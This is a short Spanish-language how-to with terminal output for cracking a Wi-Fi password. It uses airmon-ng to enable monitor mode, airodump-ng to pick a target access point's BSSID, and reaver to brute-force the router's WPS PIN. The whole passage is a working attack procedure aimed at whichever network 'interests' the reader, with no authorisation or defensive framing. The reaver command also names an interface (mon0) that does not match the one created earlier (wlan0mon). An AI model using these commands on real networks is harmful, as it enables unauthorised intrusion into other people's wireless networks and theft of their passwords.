sierra@sierra:~# airmon-ng PHY Interface Driver Chipset phy0 wlan0 rtl8187 Realtek Semiconductor Corp. RTL8187 sierra@sierra:~# airmon-ng start wlan0 Found 3 processes that could cause trouble. If airodump-ng, aireplay-ng or airtun-ng stops working after a short period of time, you may want to run 'airmon-ng check kill' PID Name 1100 NetworkManager 1169 dhclient 1353 wpa_supplicant PHY Interface Driver Chipset phy0 wlan0 rtl8187 Realtek Semiconductor Corp. RTL8187 (mac80211 monitor mode vif enabled for [phy0]wlan0 on [phy0]wlan0mon) (mac80211 station mode vif disabled for [phy0]wlan0) sierra@sierra:~# airodump-ng -i wlan0mon
Este último comando nos dará una lista de AP (puntos de accesos), y cuando nos parezca oportuno pararlo hacemos Cntrl-C, deteniendo el proceso, tomando nota del BSSID que nos interesa...
Ahora ya podemos usar reaver con el siguiente comando
reaver -b 00:11:22:33:44:55 -d 30 -x 3 -S -w -vv -c 8 -i mon0
Ahora a esperar, si hay suerte y no han cambiado el pin la contraseña para algunos saldrá en menos de un minuto, pero sino, habrá que esperar durante el proceso bastane tiempo. Hay que estar pendiendo de la infomación que sale y ver el porcentaje que lleva y saber que está funcionando...